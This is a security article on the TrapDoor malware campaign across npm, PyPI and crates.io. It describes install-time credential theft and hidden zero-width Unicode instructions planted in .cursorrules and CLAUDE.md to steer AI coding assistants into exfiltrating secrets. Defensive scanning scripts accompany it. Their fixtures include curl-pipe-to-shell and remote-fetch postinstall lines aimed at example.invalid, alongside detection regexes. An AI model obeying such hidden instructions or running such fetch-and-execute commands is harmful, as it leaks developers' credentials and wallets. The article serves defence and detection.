What makes TrapDoor particularly dangerous is not just its cross-ecosystem reach, but a novel evasion technique that weaponizes AI coding assistants themselves. The malware plants hidden instructions inside .cursorrules and CLAUDE.md files using zero-width Unicode characters, invisible to human reviewers but fully visible to tools like Cursor and Claude Code, which can then be tricked into exfiltrating secrets under the guise of routine security scans.
The TrapDoor campaign operated simultaneously across three major open-source package registries, using a distinct execution mechanism tailored to each platform.
The bulk of the malicious packages appeared on npm, where they used postinstall hooks to run a credential harvester automatically at install time, before the developer had written a single line that imported them. The core payload, a script of roughly 1,149 lines called trap-core.js, systematically scans the victim's environment for secrets and exfiltrates them to attacker-controlled infrastructure.
The Python packages distributed through PyPI fetched and executed remote JavaScript payloads at import time, so simply importing the module was enough to trigger execution (which presupposes a JavaScript runtime on the victim's machine, a safe bet on a developer workstation). Once running, they deployed the same credential-stealing logic as the npm variants.
On crates.io, the Rust ecosystem's primary registry, the malicious packages abused build.rs build scripts, which Cargo compiles and runs automatically before the crate itself is built. The exfiltration code therefore ran before any of the package's intended functionality was ever used.
The packages were disguised as legitimate developer tooling with names like token-usage-tracker, prompt-engineering-toolkit, and eth-wallet-security-auditor, making them appear useful to the targeted developer communities.
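The common thread in the three mechanisms is that the code runs at install or build time, before anyone reads it. As an added illustration (not code from Socket, and not anything from the campaign), the script below enumerates the two install-time execution surfaces that leave a static marker: npm lifecycle scripts declared in package.json, and Cargo build scripts in the registry source cache. PyPI import-time execution has no comparable static marker, so it is out of scope here. The node_modules/ and ~/.cargo/registry/src/<index>/<crate>-<version>/ layouts are assumed, the "suspicious command" regex is a heuristic, and the package and crate names in the demo tree are constructed.

```python
"""Enumerate install-time and build-time execution surfaces in a dependency
tree: npm lifecycle scripts in package.json files and Cargo build scripts.

Added example for this article; not Socket's tooling and not TrapDoor code.
Assumes the standard node_modules/ layout and Cargo's registry source cache
layout (~/.cargo/registry/src/<index>/<crate>-<version>/). The sample tree
built by build_sample_tree() is constructed for illustration only.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically during `npm install` for every
# dependency unless --ignore-scripts is set; test/build/start do not run.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic markers for install scripts that fetch or decode code at install
# time. A match is a reason to read the script, not proof of malice.
SUSPICIOUS_CMD = re.compile(r"curl|wget|base64|node\s+-e|eval|https?://", re.I)

# Cargo runs build.rs, or the file named by `build = "..."` in Cargo.toml,
# before compiling the crate itself.
CARGO_BUILD_KEY = re.compile(r'^\s*build\s*=\s*"([^"]+)"', re.M)


def npm_install_scripts(node_modules: Path) -> list[dict]:
    """Return every install-time lifecycle script found under node_modules."""
    findings = []
    for pkg_json in sorted(node_modules.rglob("package.json")):
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, not our concern here
        scripts = meta.get("scripts") or {}
        for hook in NPM_INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                findings.append({
                    "package": meta.get("name", pkg_json.parent.name),
                    "path": str(pkg_json.parent.relative_to(node_modules)),
                    "hook": hook,
                    "command": cmd,
                    "suspicious": bool(SUSPICIOUS_CMD.search(cmd)),
                })
    return findings


def cargo_build_scripts(registry_src: Path) -> list[str]:
    """Return '<crate>-<version>' directory names that carry a build script."""
    crates = []
    if not registry_src.is_dir():
        return crates
    for index_dir in sorted(p for p in registry_src.iterdir() if p.is_dir()):
        for crate_dir in sorted(p for p in index_dir.iterdir() if p.is_dir()):
            manifest = crate_dir / "Cargo.toml"
            custom = None
            if manifest.is_file():
                m = CARGO_BUILD_KEY.search(manifest.read_text(encoding="utf-8", errors="replace"))
                custom = m.group(1) if m else None
            if (crate_dir / "build.rs").is_file() or custom:
                crates.append(crate_dir.name)
    return crates


def build_sample_tree(base: Path) -> None:
    """Constructed fixture: one clean npm package, one with a postinstall hook,
    one crate with build.rs and one without. All names are made up."""
    clean = base / "node_modules" / "clean-lib"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps(
        {"name": "clean-lib", "version": "1.0.0", "scripts": {"test": "node test.js"}}))
    hooked = base / "node_modules" / "example-hooked-pkg"
    hooked.mkdir(parents=True)
    (hooked / "package.json").write_text(json.dumps(
        {"name": "example-hooked-pkg", "version": "0.0.1",
         "scripts": {"postinstall": "node -e \"require('https').get('https://example.invalid/x')\""}}))
    index = base / "registry" / "src" / "index.example-0000"
    (index / "example-crate-0.1.0").mkdir(parents=True)
    (index / "example-crate-0.1.0" / "Cargo.toml").write_text('[package]\nname = "example-crate"\n')
    (index / "example-crate-0.1.0" / "build.rs").write_text("fn main() {}\n")
    (index / "plain-crate-2.0.0").mkdir(parents=True)
    (index / "plain-crate-2.0.0" / "Cargo.toml").write_text('[package]\nname = "plain-crate"\n')


def demo() -> dict:
    """Build the sample tree in a temp dir and return both audits."""
    base = Path(tempfile.mkdtemp(prefix="install-surface-"))
    build_sample_tree(base)
    return {"npm": npm_install_scripts(base / "node_modules"),
            "cargo": cargo_build_scripts(base / "registry" / "src")}


if __name__ == "__main__":
    result = demo()
    for f in result["npm"]:
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"npm   {f['package']:<22} {f['hook']:<11} {flag}: {f['command']}")
    for c in result["cargo"]:
        print(f"cargo {c}: build script runs before compile")
```

Run it against a real checkout by pointing npm_install_scripts at ./node_modules and cargo_build_scripts at ~/.cargo/registry/src. Anything it lists is code that executes without being imported; for npm, `npm install --ignore-scripts` lets you fetch first and read the listed scripts before running them.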
The TrapDoor payload systematically hunts for a broad range of high-value secrets. According to Socket's analysis, the malware harvests wallet files and keystores, SSH private keys, GitHub personal access tokens, AWS credentials, environment variables containing API keys, browser-stored credentials, and other developer secrets from the compromised machine.
Wallet-specific targets explicitly mentioned in reporting include MetaMask and Phantom browser-extension data. The theft of GitHub tokens is particularly concerning because it lets attackers read private source repositories, inject malicious code into CI/CD pipelines, or pivot laterally through the compromised developer's identity.
Socket's investigation identified crypto, DeFi, Solana, Sui, and AI developers as the primary targets. The campaign's package naming conventions appealed directly to these communities, with themes around wallet security auditing, transaction monitoring, smart contract development, and AI context tooling.
The attackers understood that developers in these ecosystems routinely hold wallet keys for significant assets, access cloud infrastructure, and have privileged permissions across development toolchains, making a single compromised workstation a gateway to substantial financial and operational damage.
The most technically novel aspect of TrapDoor is its exploitation of AI coding assistant trust boundaries. The malware attempts to modify or drop .cursorrules and CLAUDE.md files, the configuration files developers use to give project-specific instructions to AI coding tools like Cursor and Claude Code.
Inside these files, the attackers embed hidden instructions using zero-width Unicode characters (such as U+200B ZERO WIDTH SPACE, U+200C ZERO WIDTH NON-JOINER, and U+FEFF ZERO WIDTH NO-BREAK SPACE). These characters render as nothing in text editors and in standard code-review diffs, so a human developer sees nothing suspicious. AI coding assistants, however, receive the full Unicode text and can be tricked into treating the hidden instructions as legitimate directives, potentially executing credential-harvesting workflows, exfiltrating source code, or running arbitrary shell commands without the developer's knowledge.
This creates a two-stage compromise: the package infects the developer's environment and steals immediate credentials, while the poisoned AI config file weaponizes the developer's own AI tools for further exploitation. Related research has confirmed that production AI agent platforms, including Claude Code and GitHub Copilot, can execute arbitrary commands embedded as invisible Unicode instructions in agent skill files.
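The detection side of this, as an added example rather than anything from the campaign or from Socket: a scanner that reports every invisible or direction-altering character in .cursorrules and CLAUDE.md files with its line, column, code point and Unicode name, so a reviewer sees exactly what the editor hides. It deliberately generalizes beyond the three characters named above by flagging the whole Unicode Cf (format) category, which also catches the bidi overrides U+202A to U+202E, the isolates U+2066 to U+2069, the word joiner U+2060 and the tag block U+E0000 to U+E007F, plus a few blank-looking non-Cf characters I chose to include. The file contents in SAMPLE are constructed for the demo and are not a payload from the campaign.

```python
"""Report invisible and direction-altering Unicode in AI-assistant instruction
files (.cursorrules, CLAUDE.md) with line, column, code point and name.

Added example for this article, not Socket's tooling. Every character in
Unicode category Cf (format) is flagged, plus a handful of visually blank
characters from other categories. SAMPLE is constructed for the demo.
"""
import tempfile
import unicodedata
from pathlib import Path

# Not category Cf, but render as blank or as a line break and have no place
# in a plain-text instructions file (LINE/PARAGRAPH SEPARATOR, HANGUL FILLER,
# BRAILLE PATTERN BLANK).
BLANK_LOOKING = {0x2028, 0x2029, 0x3164, 0x2800}

# The files the article names; Cursor and Claude Code read these as instructions.
INSTRUCTION_FILES = (".cursorrules", "CLAUDE.md")


def is_invisible(ch: str) -> bool:
    return unicodedata.category(ch) == "Cf" or ord(ch) in BLANK_LOOKING


def find_invisible(text: str) -> list[dict]:
    """Locate every invisible character. A BOM (U+FEFF) at offset 0 is a normal
    editor artefact and is skipped; the same character anywhere else is flagged."""
    if text.startswith("\ufeff"):
        text = text[1:]
    hits = []
    # Split on "\n" only: str.splitlines() treats U+2028/U+2029 as line ends
    # and would silently swallow two of the characters we are looking for.
    for lineno, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if is_invisible(ch):
                hits.append({
                    "line": lineno,
                    "col": col,
                    "codepoint": f"U+{ord(ch):04X}",
                    "name": unicodedata.name(ch, "<unnamed>"),
                })
    return hits


def strip_invisible(text: str) -> str:
    """Remediation helper: drop the flagged characters and keep everything else."""
    return "".join(ch for ch in text if not is_invisible(ch))


def scan_tree(root: Path) -> dict[str, list[dict]]:
    """Scan every instruction file under root; keys are paths relative to root."""
    report = {}
    for name in INSTRUCTION_FILES:
        for path in sorted(root.rglob(name)):
            hits = find_invisible(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


# Constructed sample: a plausible rules file with a run of zero-width
# characters after one line and two Unicode "tag" characters after another.
SAMPLE = (
    "# Project conventions\n"
    "Use 4-space indentation.\n"
    "Run tests before committing.\u200b\u200c\u200c\u200b\u200d\ufeff\n"
    "Prefer small pull requests.\U000E0041\U000E0042\n"
)


def demo() -> dict[str, list[dict]]:
    """Write one poisoned and one clean file into a temp dir and scan them."""
    base = Path(tempfile.mkdtemp(prefix="rules-scan-"))
    (base / ".cursorrules").write_text(SAMPLE, encoding="utf-8")
    (base / "CLAUDE.md").write_text("Clean file, nothing hidden.\n", encoding="utf-8")
    return scan_tree(base)


if __name__ == "__main__":
    for rel, hits in demo().items():
        for h in hits:
            print(f"{rel}:{h['line']}:{h['col']}  {h['codepoint']}  {h['name']}")
```

Point scan_tree at a repository root to cover every project at once. The two tag characters in the sample are the kind of thing a grep restricted to the U+200B to U+202F range misses, which is why the scanner keys off the Cf category rather than a fixed list.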
Socket's detection infrastructure flagged TrapDoor releases with a median detection time of 5 minutes 27 seconds; the fastest detection took 58 seconds. This rapid identification allowed researchers to connect the seemingly scattered package publications into a single coordinated campaign within 48 hours of the first suspicious upload.
All 34 identified packages across the three registries have been reported to the respective registry maintainers for removal.
If you or your team installed any of these packages, act immediately:
Treat every seed phrase that was on the machine as compromised: create new wallets and move funds into them. Rotate AWS IAM keys, GitHub personal access tokens, SSH key pairs, and any API tokens stored in environment variables. Revoke OAuth tokens for CI/CD integrations.
Run npm audit and pip list, and inspect Cargo.lock, for any of the 34 reported malicious packages. Search lock-file history in git for these package names, remove any matches, and run a clean install.
Check ~/.bashrc, ~/.zshrc, ~/.profile, and ~/.config/fish/config.fish for suspicious aliases or unexpected curl and wget commands that could establish persistence.
Examine .git/hooks/ in every repository for unauthorized pre-commit, post-commit, or pre-push hooks. The campaign's targeting of GitHub tokens makes account-level repository compromise a real possibility.
Review .github/workflows/ for unexpected workflow files, suspicious curl or wget steps, and unauthorized third-party actions. Check Actions run logs for unusual outbound network requests.
Search all projects for .cursorrules and CLAUDE.md files containing zero-width Unicode characters. A grep command to detect invisible characters is:
grep -P '[\x{200B}-\x{200F}\x{2028}-\x{202F}\x{FEFF}]' .cursorrules CLAUDE.md
Two caveats: grep -P only accepts code points above U+00FF in a UTF-8 locale (set LC_ALL=C.UTF-8 if it reports an error), and this range does not cover every invisible character. The word joiner U+2060, the bidi isolates U+2066 to U+2069, and the Unicode tag block U+E0000 to U+E007F can also carry invisible text and are worth adding to the class.
Check cron jobs (crontab -l), user systemd units (~/.config/systemd/user/), and LaunchAgents on macOS (~/Library/LaunchAgents/) for malicious entries.
Integrate supply-chain security scanning into your CI pipeline to catch suspicious packages before installation. Consider runtime detection tools that monitor access to wallet files, SSH keys, cloud credentials, and browser data directories.
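The filesystem checks above, collected into one added triage script (mine, not Socket's tooling): it searches lockfiles for a supplied list of package names, scans shell startup files for fetch-and-execute lines, lists live git hooks, and flags curl/wget steps and third-party actions in workflow files. The rc-file list and lockfile names follow the steps above; the regular expressions are my heuristics, the trusted-owner allowlist for actions is an assumption to tune per organization, and the demo tree it builds (home directory, lockfile, hook and workflow contents) is constructed. Pass the package names from the published indicator list; the three names the article quotes are used only in the demo.

```python
"""Post-exposure triage: lockfiles naming reported packages, shell startup
files that fetch-and-execute, live git hooks, and unexpected workflow steps.

Added example for this article; not Socket's tooling. Every pattern is a
heuristic that points to a line worth reading, not a verdict. The tree built
by build_sample_tree() is constructed for the demo.
"""
import re
import stat
import tempfile
from pathlib import Path

LOCKFILES = ("package-lock.json", "yarn.lock", "pnpm-lock.yaml",
             "Cargo.lock", "poetry.lock", "requirements.txt")
SHELL_RC = (".bashrc", ".zshrc", ".profile", ".config/fish/config.fish")
# "curl ... | sh", "wget -qO- ... | bash", eval "$(curl ...)", "base64 -d ... |"
FETCH_EXEC = re.compile(
    r"(curl|wget)[^|\n]*\|\s*(ba|z)?sh\b|eval\s+[\"']?\$\((curl|wget)|base64\s+(-d|--decode)[^|\n]*\|", re.I)
# Assumption: actions owned by these orgs are first-party; anything else is listed for review.
TRUSTED_ACTION_OWNERS = {"actions", "github"}
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*([^\s@]+)", re.M)


def lockfile_matches(root: Path, names) -> list[tuple[str, str]]:
    """(lockfile, package) pairs where a reported name appears as a whole token."""
    pats = {n: re.compile(r"(?<![\w-])" + re.escape(n) + r"(?![\w-])") for n in names}
    out = []
    for lock in LOCKFILES:
        for path in sorted(root.rglob(lock)):
            text = path.read_text(encoding="utf-8", errors="replace")
            out += [(str(path.relative_to(root)), n) for n, p in pats.items() if p.search(text)]
    return out


def shell_rc_findings(home: Path) -> list[tuple[str, int, str]]:
    """(rc file, line number, line) for fetch-and-execute lines in startup files."""
    out = []
    for rc in SHELL_RC:
        path = home / rc
        if path.is_file():
            for no, line in enumerate(path.read_text(encoding="utf-8", errors="replace").splitlines(), 1):
                if FETCH_EXEC.search(line):
                    out.append((rc, no, line.strip()))
    return out


def git_hook_findings(root: Path) -> list[str]:
    """Executable, non-.sample files in any .git/hooks directory (git runs these)."""
    out = []
    for hooks in sorted(root.rglob(".git/hooks")):
        for f in sorted(hooks.iterdir()):
            if f.is_file() and f.suffix != ".sample" and f.stat().st_mode & stat.S_IXUSR:
                out.append(str(f.relative_to(root)))
    return out


def workflow_findings(root: Path) -> list[tuple[str, str]]:
    """curl/wget usage and third-party `uses:` actions in .github/workflows files."""
    out = []
    for wf_dir in sorted(root.rglob(".github/workflows")):
        for wf in sorted(p for p in wf_dir.iterdir() if p.suffix in (".yml", ".yaml")):
            text = wf.read_text(encoding="utf-8", errors="replace")
            rel = str(wf.relative_to(root))
            if re.search(r"\b(curl|wget)\b", text):
                out.append((rel, "fetches remote content with curl/wget"))
            for action in USES_LINE.findall(text):
                # local actions start with "." and docker:// images are out of scope here
                if not action.startswith((".", "docker://")) and action.split("/")[0] not in TRUSTED_ACTION_OWNERS:
                    out.append((rel, f"third-party action {action}"))
    return out


def build_sample_tree(base: Path) -> None:
    """Constructed fixture: a home dir with a tampered .zshrc and a project with a
    lockfile naming one reported package, a live pre-commit hook and a workflow."""
    home, proj = base / "home", base / "project"
    (home / ".config" / "fish").mkdir(parents=True)
    (home / ".zshrc").write_text("alias ll='ls -la'\ncurl -fsSL https://example.invalid/i.sh | sh\n")
    (home / ".config" / "fish" / "config.fish").write_text("set -gx EDITOR vim\n")
    (proj / ".git" / "hooks").mkdir(parents=True)
    (proj / ".github" / "workflows").mkdir(parents=True)
    (proj / "package-lock.json").write_text(
        '{"packages": {"node_modules/token-usage-tracker": {"version": "1.0.0"}}}\n')
    (proj / "Cargo.lock").write_text('[[package]]\nname = "serde"\nversion = "1.0.0"\n')
    hook = proj / ".git" / "hooks" / "pre-commit"
    hook.write_text("#!/bin/sh\nexit 0\n")
    hook.chmod(0o755)
    (proj / ".git" / "hooks" / "pre-push.sample").write_text("#!/bin/sh\n")
    (proj / ".github" / "workflows" / "ci.yml").write_text(
        "jobs:\n  build:\n    steps:\n      - uses: actions/checkout@v4\n"
        "      - uses: someone/unknown-action@v1\n"
        "      - run: curl -sS https://example.invalid/setup.sh | bash\n")


def demo(names=("token-usage-tracker", "prompt-engineering-toolkit", "eth-wallet-security-auditor")) -> dict:
    """Build the constructed tree in a temp dir and run all four checks on it."""
    base = Path(tempfile.mkdtemp(prefix="triage-"))
    build_sample_tree(base)
    return {"lockfiles": lockfile_matches(base, names),
            "shell_rc": shell_rc_findings(base / "home"),
            "git_hooks": git_hook_findings(base),
            "workflows": workflow_findings(base)}


if __name__ == "__main__":
    for section, findings in demo().items():
        for f in findings:
            print(f"{section:<9} {f}")
```

For real use, call lockfile_matches and git_hook_findings on the directory that holds your checkouts, shell_rc_findings on Path.home(), and workflow_findings on the same checkout root; the cron, systemd and LaunchAgents checks above are host-specific and are left to the commands listed there.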